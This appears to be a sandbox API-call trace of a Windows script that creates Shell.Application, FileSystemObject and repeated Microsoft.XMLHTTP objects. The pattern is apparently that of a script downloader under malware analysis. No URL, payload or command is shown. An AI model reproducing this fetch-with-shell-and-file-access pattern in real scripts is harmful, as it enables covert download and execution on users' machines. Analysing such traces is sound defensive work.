	[0320.679] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0320.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0320.679] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0320.679] SysStringLen (param_1=0x0) returned 0x0
	[0320.679] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0320.680] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0320.680] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0320.680] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0320.680] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0320.680] ??2@YAPEAX_K@Z () returned 0x62f350
	[0320.680] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0320.680] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0320.680] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0320.680] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0320.680] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0320.680] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0320.680] SysStringLen (param_1=0x0) returned 0x0
	[0320.680] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0320.684] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0320.684] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0320.684] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0320.684] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0320.684] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0320.684] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0321.176] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0321.176] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0321.176] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0321.177] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0321.177] SysStringLen (param_1=0x0) returned 0x0
	[0321.177] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0321.178] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0321.178] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0321.178] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0321.178] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7288) returned 0x0
	[0321.178] ??2@YAPEAX_K@Z () returned 0x62f310
	[0321.178] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7288, pUnkSite=0x62f310) 
	[0321.178] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0321.178] XMLHTTPRequest:IUnknown:Release (This=0x49c7288) returned 0x0
	[0321.178] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0321.178] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0321.178] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0321.178] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0321.181] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0321.181] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0321.181] SysStringLen (param_1=0x0) returned 0x0
	[0321.181] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0321.181] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0321.181] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0321.181] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0321.181] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0321.181] ??2@YAPEAX_K@Z () returned 0x62f330
	[0321.182] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0321.182] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0321.182] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0321.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0321.182] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0321.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0321.182] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0321.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0321.182] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0321.182] SysStringLen (param_1=0x0) returned 0x0
	[0321.182] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0321.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0321.182] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7310) returned 0x0
	[0321.182] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0321.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7310, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0321.182] ??2@YAPEAX_K@Z () returned 0x62f310
	[0321.183] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0321.183] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0321.183] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0321.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7310, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7310) returned 0x0
	[0321.183] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7310) returned 0x3
	[0321.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7310, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0321.183] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7310, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0321.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7310, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0321.183] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0321.183] SysStringLen (param_1=0x0) returned 0x0
	[0321.183] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0321.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0321.183] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0321.183] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0321.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0321.183] ??2@YAPEAX_K@Z () returned 0x62f330
	[0321.183] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0321.183] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0321.183] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0321.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0321.184] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0321.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0321.184] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0321.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0321.184] longjmp () 
	[0321.184] longjmp () 
	[0321.184] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0321.184] SysStringLen (param_1=0x0) returned 0x0
	[0321.184] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0321.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0321.184] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0321.184] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0321.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0321.184] ??2@YAPEAX_K@Z () returned 0x62f310
	[0321.184] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0321.184] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0321.185] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
